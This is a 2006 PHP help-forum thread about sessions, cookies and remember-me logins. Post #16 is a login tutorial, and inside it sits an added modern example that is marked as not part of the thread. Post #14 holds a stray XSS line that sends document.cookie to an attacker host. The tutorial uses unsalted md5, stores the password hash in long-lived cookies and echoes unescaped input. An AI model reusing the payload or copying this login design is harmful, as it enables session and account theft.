
sessions and sids


21 replies to this topic

#1 Ninjakreborn


Posted 20 July 2006 - 01:07 PM

I was wondering what the point is of using sessions to manage state for logins. You either save SIDs in URLs or you send them through cookies; what I see as the recommended and safer way is cookies. But what about encrypting your session IDs and decrypting them, is there a point? What about if someone doesn't have cookies, can you use sessions like that and still work around that, or is there no point?

------

Business Website: http://www.infotechnologist.biz

Personal Website: http://www.joyelpuryear.com

Blog Site: http://www.realmofwriting.com
Services: Web development, application development, mobile development, and custom development. All services listed on my website.


#2 trq


Posted 20 July 2006 - 01:40 PM

There is no point encrypting / decrypting session ids and if your target audience is inclined to have cookies off, then parsing your session id through the url is the only way.

#3 manichean


Posted 20 July 2006 - 01:46 PM

You could pass the SID through a hidden value on a form. 8)

#4 wildteen88


Posted 20 July 2006 - 03:59 PM

You can use sessions with a database if you wish to, rather than having the SESSID being stored in a cookie/url. Or you can use a secure HTTP connection (https), which will encrypt any data being transferred from client to server, or from server to server.

#5 Ninjakreborn


Posted 20 July 2006 - 06:40 PM

There are 3 ways of passing session IDs: through URLs, through form fields, or through cookies, or database I guess.  I understand the relationship between the session and the cookie.  But I don't understand, if I store the SIDs in a database, how does it access that, or does each person get a different session ID stored on the database on the same table as their username and password?  Like for instance when they log in, I set a session and register the username/password, or whatever else, I store the session ID into the database.  So every time they visit the site, it searches for that database to log them in automatically or something. Some of this is still a little confusing and I am trying to get down sessions. Encryption was pretty easy, 3 days and I know a lot about it; cookies, I created a cookie login page in 20 minutes with no experience with cookies, so that was easy as hell, but now sessions.  So do I even have a need to encrypt my passwords if it's ssh, or ssl, or whatever, because I have that set up now.  The thing is, what if someone gets into the database? What I heard is that it's stupid to leave a plain text password stored in a database, but the crypt function's a piece of shit, the mcrypt library is severe overkill, and mysql's encode/decode functions suck anus.  There has to be another way. Hash is something I can't figure out; I could probably hash something but have no idea how to compare it when they enter the password at login, and I try to authenticate the user.



#6 wildteen88


Posted 20 July 2006 - 07:11 PM

With sessions you can completely change the way it treats sessions; rather than having the sessions being stored in a file on the server, you make it write to the database. Have a look at session_set_save_handler for more information.

#7 Ninjakreborn


Posted 20 July 2006 - 07:45 PM

Ok, let me just ask the questions I don't understand; if anyone can answer, it'll be appreciated.

1. Is it better to save the sessions in the files, or on a database?
2. What is the best way to handle session IDs, and what should I pick as session IDs?
3. Well, that's it, except how to allow people to remain logged in even if they don't have cookies if I choose to pass the session ID through a cookie, or is this stupid? Because I know a lot of people who do it.



#8 wildteen88


Posted 20 July 2006 - 07:50 PM

It's down to you and depends on the app you are developing. I know a few PHP apps, mainly forums/CMSs, that create their own session handlers, which store sessions within the database.

Session IDs are generated automatically and are unique.

#9 Ninjakreborn


Posted 20 July 2006 - 09:17 PM

I have read on a lot of tutorial sites and stuff that it's best to hash your SIDs when passing them, because it lowers the chances of someone trying to guess the session ID to get into the existing session. Another thing I wanted to ask: would I be stupid to rely purely on cookies for login?  So if I store the sessions in a file, and the IDs in a database, that will prevent the person from having to log in every time and they still won't have to deal with cookies or anything?



#10 trq


Posted 20 July 2006 - 09:48 PM

> You can use sessions with a database if you wish to, rather than having the SESSID being stored in a cookie/url.

What? You can save session data in a database on the server, but you still need a method for recognising the client, i.e. cookies, or passing via URL / forms.

> So if I store the sessions in a file, and the IDs in a database, that will prevent the person from having to log in every time and they still won't have to deal with cookies or anything?

No... in order for a user to not have to worry about logging in each time they visit a site you'll need to set a cookie. How else will you recognise the client?

Storing session data in a database is a different topic, and really is no different to storing it in files (as is the default), except that you can persist certain information and it also makes it much easier to keep track of who is where on your site (who's online lists and the like).

#11 Ninjakreborn


Posted 20 July 2006 - 09:51 PM

Alright then, explain this and I am ready to go.  I visit a lot of sites to look around, on a regular basis, and I see a lot of them, free logins, I log in just for the hell of it, and I end up finding out something like I can stay logged in.  I see that if I disable cookies I can't.  Then there are other sites I try the same thing, but even though cookies are disabled, I can still automatically log in each time. I have tested this from various sites in all three browsers; some of them keep you logged in for a specific amount of time after the session, but no cookies get delivered or removed from the browser.



#12 trq


Posted 20 July 2006 - 09:54 PM

How long a time frame are we talking here? Hours, days, weeks? What?

#13 redarrow


Posted 20 July 2006 - 09:59 PM

What is the problem here? If you validate user information properly then there is no problem, is there?

Sessions are great.

You recently had a post on sessions and cookies and were told to use both, but now after all that explaining you continue to ask the same questions.


Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.a...aypal1_info.inc

#14 redarrow


Posted 20 July 2006 - 10:06 PM



Quick cookie example of remember me, ok.

$username = $_POST['username'];
$password = sha1($_POST['password']);

$DB->query('INSERT INTO users (username, password) VALUES (?, ?)', array($username, $password)); 

 
$username = $_POST['username'];
$password = sha1($_POST['password']);

/* Hash the input password and check it against
   the already hashed password stored in the database.
   
   Since both passwords are hashed using the same hash
   function, the two passwords will match if the user
   enters the correct password
*/

$user = $DB->getRow('SELECT * FROM users WHERE username=? AND password=?', array($username, $password));

if(!$user)
    die('Sorry, incorrect username or password.'); 

 
<img src="logo.gif" width="1" height="1" onload="window.location='http://cracker-site.com/save?cookie='+document.cookie" /> Hi guys, I'm new to your site!


$username = $_POST['username'];
$password = sha1($_POST['password']);

/* Hash the input password and check it against
   the already hashed password stored in the database.
   
   Since both passwords are hashed using the same hash
   function, the two passwords will match if the user
   enters the correct password
*/

$user = $DB->getRow('SELECT * FROM users WHERE username=? AND password=?', array($username, $password));

if(!$user)
    die('Sorry, incorrect username or password.');
    
// Did this user check that 'remember me' checkbox?
if($_POST['remember_me'])
{
    $expire = time() + 1728000; // Expire in 20 days
    $cookie_pass = sha1( sha1($user['password']) . sha1($user['salt']) );
    
    setcookie('user', $user['username'], $expire);
    setcookie('pass', $cookie_pass, $expire);
}  



if(isset($_COOKIE['user'], $_COOKIE['pass']))
{
    $user = $DB->getRow('SELECT * FROM users WHERE username=?', $_COOKIE['user']);
    
    if($user)
    {
        $check_pass = sha1( sha1($user['password']) . sha1($user['salt']) );
        
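        // Strict comparison: with ==, two different all-digit "0e..." hex
        // strings are compared as numbers and can be treated as equal
        if($check_pass === $_COOKIE['pass'])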
        {
            // The user should be logged in
        }
    }
}  




#15 trq


Posted 20 July 2006 - 10:08 PM

redarrow... honestly, you're missing the point.

#16 redarrow


Posted 20 July 2006 - 10:17 PM

This is the only tutorial I am providing, as you should learn, ok.





database

CREATE TABLE users (  
    username varchar(30),  
    password varchar(32)); 


database.php
<?  
  
/**  
 * Connect to the mysql database.  
 */  
$conn = mysql_connect("localhost", "your_username", "your_password") or die(mysql_error());  
mysql_select_db('your_database', $conn) or die(mysql_error());  
  
?>  
  


register.php


<?  
session_start();   
include("database.php");  
  
/**  
 * Returns true if the username has been taken  
 * by another user, false otherwise.  
 */  
function usernameTaken($username){  
   global $conn;  
   if(!get_magic_quotes_gpc()){  
      $username = addslashes($username);  
   }  
   $q = "select username from users where username = '$username'";  
   $result = mysql_query($q,$conn);  
   return (mysql_numrows($result) > 0);  
}  
  
/**  
 * Inserts the given (username, password) pair  
 * into the database. Returns true on success,  
 * false otherwise.  
 */  
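function addNewUser($username, $password){
   global $conn;
   /* Add slashes if necessary (the username goes into the query) */
   if(!get_magic_quotes_gpc()){
      $username = addslashes($username);
   }
   $q = "INSERT INTO users VALUES ('$username', '$password')";
   return mysql_query($q,$conn);
}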
  
/**  
 * Displays the appropriate message to the user  
 * after the registration attempt. It displays a   
 * success or failure status depending on a  
 * session variable set during registration.  
 */  
function displayStatus(){  
   $uname = $_SESSION['reguname'];  
   if($_SESSION['regresult']){  
?>  
  
<h1>Registered!</h1>  
<p>Thank you <b><? echo $uname; ?></b>, your information has been added to the database, you may now <a href="main.php" title="Login">log in</a>.</p>  
  
<?  
   }  
   else{  
?>  
  
<h1>Registration Failed</h1>  
<p>We're sorry, but an error has occurred and your registration for the username <b><? echo $uname; ?></b>, could not be completed.<br>  
Please try again at a later time.</p>  
  
<?  
   }  
   unset($_SESSION['reguname']);  
   unset($_SESSION['registered']);  
   unset($_SESSION['regresult']);  
}  
  
if(isset($_SESSION['registered'])){  
/**  
 * This is the page that will be displayed after the  
 * registration has been attempted.  
 */  
?>  
  
<html>  
<title>Registration Page</title>  
<body>  
  
<? displayStatus(); ?>  
  
</body>  
</html>  
  
<?  
   return;  
}  
  
/**  
 * Determines whether or not to show to sign-up form  
 * based on whether the form has been submitted, if it  
 * has, check the database for consistency and create  
 * the new account.  
 */  
if(isset($_POST['subjoin'])){  
   /* Make sure all fields were entered */  
   if(!$_POST['user'] || !$_POST['pass']){  
      die('You didn\'t fill in a required field.');  
   }  
  
   /* Spruce up username, check length */  
   $_POST['user'] = trim($_POST['user']);  
   if(strlen($_POST['user']) > 30){  
      die("Sorry, the username is longer than 30 characters, please shorten it.");  
   }  
  
   /* Check if username is already in use */  
   if(usernameTaken($_POST['user'])){  
      $use = $_POST['user'];  
      die("Sorry, the username: <strong>$use</strong> is already taken, please pick another one.");  
   }  
  
   /* Add the new account to the database */  
   $md5pass = md5($_POST['pass']);  
   $_SESSION['reguname'] = $_POST['user'];  
   $_SESSION['regresult'] = addNewUser($_POST['user'], $md5pass);  
   $_SESSION['registered'] = true;  
   echo "<meta http-equiv=\"Refresh\" content=\"0;url=$HTTP_SERVER_VARS[PHP_SELF]\">";  
   return;  
}  
else{  
/**  
 * This is the page with the sign-up form, the names  
 * of the input fields are important and should not  
 * be changed.  
 */  
?>  
  
<html>  
<title>Registration Page</title>  
<body>  
<h1>Register</h1>  
<form action="<? echo $HTTP_SERVER_VARS['PHP_SELF']; ?>" method="post">  
<table align="left" border="0" cellspacing="0" cellpadding="3">  
<tr><td>Username:</td><td><input type="text" name="user" maxlength="30"></td></tr>  
<tr><td>Password:</td><td><input type="password" name="pass" maxlength="30"></td></tr>  
<tr><td colspan="2" align="right"><input type="submit" name="subjoin" value="Join!"></td></tr>  
</table>  
</form>  
</body>  
</html>  
  
  
<?  
}  
?>  



login.php

<?  
  
/**  
 * Checks whether or not the given username is in the  
 * database, if so it checks if the given password is  
 * the same password in the database for that user.  
 * If the user doesn't exist or if the passwords don't  
 * match up, it returns an error code (1 or 2).   
 * On success it returns 0.  
 */  
function confirmUser($username, $password){  
   global $conn;  
   /* Add slashes if necessary (for query) */  
   if(!get_magic_quotes_gpc()) {  
	$username = addslashes($username);  
   }  
  
   /* Verify that user is in database */  
   $q = "select password from users where username = '$username'";  
   $result = mysql_query($q,$conn);  
   if(!$result || (mysql_numrows($result) < 1)){  
      return 1; //Indicates username failure  
   }  
  
   /* Retrieve password from result, strip slashes */  
   $dbarray = mysql_fetch_array($result);  
   $dbarray['password']  = stripslashes($dbarray['password']);  
   $password = stripslashes($password);  
  
   /* Validate that password is correct (strict comparison, so two
      different "0e..." hashes are never treated as equal numbers) */
   if($password === $dbarray['password']){
      return 0; //Success! Username and password confirmed  
   }  
   else{  
      return 2; //Indicates password failure  
   }  
}  
  
/**  
 * checkLogin - Checks if the user has already previously  
 * logged in, and a session with the user has already been  
 * established. Also checks to see if user has been remembered.  
 * If so, the database is queried to make sure of the user's   
 * authenticity. Returns true if the user has logged in.  
 */  
function checkLogin(){  
   /* Check if user has been remembered */  
   if(isset($_COOKIE['cookname']) && isset($_COOKIE['cookpass'])){  
      $_SESSION['username'] = $_COOKIE['cookname'];  
      $_SESSION['password'] = $_COOKIE['cookpass'];  
   }  
  
   /* Username and password have been set */  
   if(isset($_SESSION['username']) && isset($_SESSION['password'])){  
      /* Confirm that username and password are valid */  
      if(confirmUser($_SESSION['username'], $_SESSION['password']) != 0){  
         /* Variables are incorrect, user not logged in */  
         unset($_SESSION['username']);  
         unset($_SESSION['password']);  
         return false;  
      }  
      return true;  
   }  
   /* User not logged in */  
   else{  
      return false;  
   }  
}  
  
/**  
 * Determines whether or not to display the login  
 * form or to show the user that he is logged in  
 * based on if the session variables are set.  
 */  
function displayLogin(){  
   global $logged_in;  
   if($logged_in){  
      echo "<h1>Logged In!</h1>";  
      echo "Welcome <b>$_SESSION[username]</b>, you are logged in. <a href=\"logout.php\">Logout</a>";  
   }  
   else{  
?>  
  
<h1>Login</h1>  
<form action="" method="post">  
<table align="left" border="0" cellspacing="0" cellpadding="3">  
<tr><td>Username:</td><td><input type="text" name="user" maxlength="30"></td></tr>  
<tr><td>Password:</td><td><input type="password" name="pass" maxlength="30"></td></tr>  
<tr><td colspan="2" align="left"><input type="checkbox" name="remember">  
<font size="2">Remember me next time</td></tr>  
<tr><td colspan="2" align="right"><input type="submit" name="sublogin" value="Login"></td></tr>  
<tr><td colspan="2" align="left"><a href="register.php">Join</a></td></tr>  
</table>  
</form>  
  
<?  
   }  
}  
  
  
/**  
 * Checks to see if the user has submitted his  
 * username and password through the login form,  
 * if so, checks authenticity in database and  
 * creates session.  
 */  
if(isset($_POST['sublogin'])){  
   /* Check that all fields were typed in */  
   if(!$_POST['user'] || !$_POST['pass']){  
      die('You didn\'t fill in a required field.');  
   }  
   /* Spruce up username, check length */  
   $_POST['user'] = trim($_POST['user']);  
   if(strlen($_POST['user']) > 30){  
      die("Sorry, the username is longer than 30 characters, please shorten it.");  
   }  
  
   /* Checks that username is in database and password is correct */  
   $md5pass = md5($_POST['pass']);  
   $result = confirmUser($_POST['user'], $md5pass);  
  
   /* Check error codes */  
   if($result == 1){  
      die('That username doesn\'t exist in our database.');  
   }  
   else if($result == 2){  
      die('Incorrect password, please try again.');  
   }  
  
   /* Username and password correct, register session variables */  
   $_POST['user'] = stripslashes($_POST['user']);  
   $_SESSION['username'] = $_POST['user'];  
   $_SESSION['password'] = $md5pass;  
  
   /**  
    * This is the cool part: the user has requested that we remember that  
    * he's logged in, so we set two cookies. One to hold his username,  
    * and one to hold his md5-hashed password. We set them both to
    * expire in 100 days. Now, next time he comes to our site, we will  
    * log him in automatically.  
    */  
   if(isset($_POST['remember'])){  
      setcookie("cookname", $_SESSION['username'], time()+60*60*24*100, "/");  
      setcookie("cookpass", $_SESSION['password'], time()+60*60*24*100, "/");  
   }  
  
   /* Quick self-redirect to avoid resending data on refresh */  
   echo "<meta http-equiv=\"Refresh\" content=\"0;url=$HTTP_SERVER_VARS[PHP_SELF]\">";  
   return;  
}  
  
/* Sets the value of the logged_in variable, which can be used in your code */  
$logged_in = checkLogin();  
  
?>  


logout.php


  
<?  
session_start();   
include("database.php");  
include("login.php");  
  
/**  
 * Delete cookies - the time must be in the past,  
 * so just negate what you added when creating the  
 * cookie.  
 */  
if(isset($_COOKIE['cookname']) && isset($_COOKIE['cookpass'])){  
   setcookie("cookname", "", time()-60*60*24*100, "/");  
   setcookie("cookpass", "", time()-60*60*24*100, "/");  
}  
  
?>  
  
<html>  
<title>Logging Out</title>  
<body>  
  
<?  
  
if(!$logged_in){  
   echo "<h1>Error!</h1>\n";  
   echo "You are not currently logged in, logout failed. Back to <a href=\"main.php\">main</a>";  
}  
else{  
   /* Kill session variables */  
   unset($_SESSION['username']);  
   unset($_SESSION['password']);  
   $_SESSION = array(); // reset session array  
   session_destroy();   // destroy session.  
  
   echo "<h1>Logged Out</h1>\n";  
   echo "You have successfully <b>logged out</b>. Back to <a href=\"main.php\">main</a>";  
}  
  
?>  
  
</body>  
</html>  


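
An added example, not part of the original thread, covering both the earlier question of how to compare a hashed password at login and the remember-me cookies in the posts above, whose value can be recomputed from the stored password hash and stays the same until the password changes. The sketch stores password_hash() output for login and issues a random, single-use remember-me token of which only a SHA-256 digest is kept server-side. It assumes PHP 8, PDO and HTTPS; the function names, cookie name and table layout are hypothetical.

```php
<?php
// Added example, assuming PHP 8 and a PDO connection in exception mode.
// Function, cookie and table names are assumptions for illustration:
//   users(id, username, pw_hash)
//   remember_tokens(selector PRIMARY KEY, validator_hash, user_id, expires)
const REMEMBER_COOKIE = 'remember';
const REMEMBER_TTL = 1728000; // 20 days

function registerUser(PDO $db, string $username, string $password): void
{
    // password_hash() generates a random salt and stores it inside the hash.
    $st = $db->prepare('INSERT INTO users (username, pw_hash) VALUES (?, ?)');
    $st->execute([$username, password_hash($password, PASSWORD_DEFAULT)]);
}

// Returns the user id on success, null on any failure.
function checkPassword(PDO $db, string $username, string $password): ?int
{
    $st = $db->prepare('SELECT id, pw_hash FROM users WHERE username = ?');
    $st->execute([$username]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    // The submitted password is re-hashed with the stored salt and compared
    // in PHP, not matched against the column inside the SQL query.
    if ($row === false || !password_verify($password, $row['pw_hash'])) {
        return null;
    }
    return (int) $row['id'];
}

function issueRememberToken(PDO $db, int $userId): void
{
    $selector = bin2hex(random_bytes(9));   // lookup key, not secret
    $validator = bin2hex(random_bytes(32)); // secret, exists only in the cookie
    $expires = time() + REMEMBER_TTL;
    $st = $db->prepare('INSERT INTO remember_tokens
        (selector, validator_hash, user_id, expires) VALUES (?, ?, ?, ?)');
    $st->execute([$selector, hash('sha256', $validator), $userId, $expires]);
    setcookie(REMEMBER_COOKIE, $selector . ':' . $validator, [
        'expires' => $expires, 'path' => '/',
        'secure' => true, 'httponly' => true, 'samesite' => 'Lax',
    ]);
}

// Returns the remembered user id, or null if the cookie is not valid.
function consumeRememberToken(PDO $db): ?int
{
    $raw = $_COOKIE[REMEMBER_COOKIE] ?? '';
    if (!is_string($raw)) {          // e.g. a cookie sent as remember[]=...
        return null;
    }
    $parts = explode(':', $raw, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$selector, $validator] = $parts;
    $st = $db->prepare('SELECT validator_hash, user_id, expires
                        FROM remember_tokens WHERE selector = ?');
    $st->execute([$selector]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }
    // Single use: the row is deleted whether or not the check passes.
    $db->prepare('DELETE FROM remember_tokens WHERE selector = ?')
       ->execute([$selector]);
    $valid = (int) $row['expires'] >= time()
        && hash_equals($row['validator_hash'], hash('sha256', $validator));
    if (!$valid) {
        return null;
    }
    issueRememberToken($db, (int) $row['user_id']); // rotate to a fresh token
    return (int) $row['user_id'];
}
```

Deleting a user's rows from remember_tokens on logout or password change ends every remembered login for that account, since the cookie carries nothing derived from the password.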

#17 redarrow


Posted 20 July 2006 - 10:33 PM

Does the code help?

#18 trq


Posted 20 July 2006 - 10:36 PM

redarrow. You are missing the whole point of this thread. Read the first question!

#19 redarrow


Posted 20 July 2006 - 10:53 PM


> Alright then, explain this and I am ready to go.  I visit a lot of sites to look around, on a regular basis, and I see a lot of them, free logins, I log in just for the hell of it, and I end up finding out something like I can stay logged in.  I see that if I disable cookies I can't.  Then there are other sites I try the same thing, but even though cookies are disabled, I can still automatically log in each time. I have tested this from various sites in all three browsers; some of them keep you logged in for a specific amount of time after the session, but no cookies get delivered or removed from the browser.



Sorry thorpe, I was answering the question on the remember me question, as I thought I'll do that for businessman to clear things up on the remember me issue.

PS. When it comes down to the session question, there is no difference or security difference from the default session statement to a database session code, in my opinion.

What I cannot understand is how come businessman doesn't read the manual.

I also don't know why you, businessman, always go on about encrypting this and that. Forget it, man.

Use a session as it is and enjoy.

lol..............................






#20 Ninjakreborn


Posted 20 July 2006 - 11:01 PM

Ok, so I will take a look at this and use it as an example. The reason I go on about encryption is, during the 3 months I studied security I learnt all kinds of attacks. Before I became a programmer, I was a hacker for 10 years; I knew a lot then, and a lot of my friends had easy ways to do some of these things, making me even more afraid as a programmer.  To tell you the truth, the session IDs, I had a friend who could crack a session ID in less than 20 minutes; he would listen in on the header transmissions, pull the SID from the cookie, decrypt it, and use it to gain access to the current session.  There are a lot of things I learnt as a hacker, and even more I learnt from my friends, so it makes me 100 times more scared, and I feel that if I use what I used to know, the stuff I make, and the tutorials I make for other people, will help them write more secure programming.





